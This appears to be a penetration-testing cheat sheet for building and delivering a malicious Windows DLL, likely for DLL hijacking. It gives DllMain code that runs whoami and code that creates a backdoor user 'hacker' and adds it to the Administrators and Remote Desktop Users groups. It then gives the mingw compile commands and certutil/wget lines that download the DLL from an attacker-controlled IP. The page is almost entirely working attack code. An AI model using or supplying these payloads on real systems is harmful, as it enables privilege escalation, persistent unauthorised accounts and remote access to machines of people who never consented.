Skip to content

windows_dll.c

setup

sudo apt install gcc-mingw-w64

code

windows_dll.c 

#include <windows.h>

BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
    if (dwReason == DLL_PROCESS_ATTACH) {
        system("whoami > C:\\temp\\message.txt");
        ExitProcess(0);
    }
    return TRUE;
}

windows_dll.c 

#include <windows.h>

BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
    if (dwReason == DLL_PROCESS_ATTACH) {
        system("cmd.exe /k net user hacker hacker /add");
        system("cmd.exe /k NET LOCALGROUP 'Administrators' hacker /ADD");
        system("cmd.exe /k NET LOCALGROUP 'Remote Desktop Users' hacker /ADD");
        ExitProcess(0);
    }
    return TRUE;
}

compile

x86_64-w64-mingw32-gcc windows_dll.c -shared -o windows.dll

deliver

certutil -urlcache -f http://192.168.45.171/windows.dll windows.dll
wget http://192.168.45.171/windows.dll -O windows.dll

other

  • poc system("cmd.exe /k whoami > C:\\Windows\\Temp\\dll.txt");
  • For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
  • For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll
  • source: https://github.com/sagishahar/scripts